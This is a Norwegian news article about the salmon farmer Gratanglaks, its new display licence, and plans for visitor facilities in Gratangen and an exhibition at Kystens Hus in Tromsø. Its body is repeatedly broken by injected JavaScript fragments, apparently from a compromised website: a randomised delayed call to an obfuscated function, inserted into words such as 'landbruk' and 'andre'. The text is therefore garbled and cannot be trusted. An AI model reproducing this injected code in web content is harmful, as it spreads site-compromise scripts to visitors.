Laksen fra Gratangen til Tromsø

Bakvegg Aqua Nor 2015, Gratanglaks og Kleiva

Foto: Alvin Jensvold

Gratanglaks har fått det kanskje mest prestisjetunge utstillingsviduet som er å oppdrive for et havbruksselskap i nord.

Tar laksen fra Gratangen til Tromsø i et todelt konsept

Gratanglaks fikk i sommer tildelt visningskonsesjon, og konseptet med denne visningskonsesjon er todelt. Det er en fullverdig visningskonsesjon i Gratangen tilrettelagt for fysiske besøk både på settefiskanlegg, matfiskanlegg og slakteri. Men i tillegg blir det mulig for både turister, FoU miljø, barnehager, skoleelever, media og andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andre som ønsker et bedre innblikk i hva som faktisk skjer på et oppdrettsanlegg, å gjøre det ved å gå innom Kystens Hus i Tromsø.

Kystens Hus er et kompetansesenter og formidler det kysten har å tilby innenfor sjømat, kystkultur, landom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andbruk, forsking, innovasjon og utvikling i landom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andsdelen. Denne visningskonsesjonen hvor en tar laksen visuelt fra Gratangen til Tromsø vil være med å styrke formidlingsarbeidet og å synliggjøre laksen.

De som besøker Gratangen får oppleve hele produksjonen fra A til Å, mens det blir et mer visuelt framstilling for de som besøker Kystens Hus i Tromsø. Det handom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andler om «live» produksjon av smolt på landom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and, fôring av fisken i merdene, kontrollrutiner, kamera under vann, slakting m.m.

I tillegg til utstillingsdelen på Kystens Hus, vil Gratanglaks også etablere seg med kontordel i bygget. Dette er et kostbart prosjekt for Gratanglaks, som ønsker å være med å ta ansvaret for å synliggjøre havbruksnæringa og innser at de når flere folk på Kystens Hus i Tromsø enn de når i Gratangen.  Gjennom visningssenteret på Kystens Hus, kan Gratanglaks i tillegg markedsføre de andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andre visningsanleggene rundt omkring i Troms.

Havbruksnæringa får mye oppmerksomhet i media, og flere vil vite mer om hvordan produksjonen på anleggene foregår. Det gjelder både turister, forskere og befolkning både lokalt og regionalt. Ved å etablere visningsanlegg når næringen ut til mange flere og et bredere publikum, og Gratanglaks håper mange vil besøke anleggene når de står ferdig.

 

0 replies

Legg igjen et svar

Want to join the discussion?
Feel free to contribute!

Legg igjen en kommentar

Din e-postadresse vil ikke bli publisert. Obligatoriske felt er merket med *